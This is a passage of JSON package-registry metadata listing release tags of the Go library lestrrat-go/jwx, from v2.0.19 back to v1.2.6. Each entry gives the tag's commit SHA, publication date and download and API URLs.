GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"h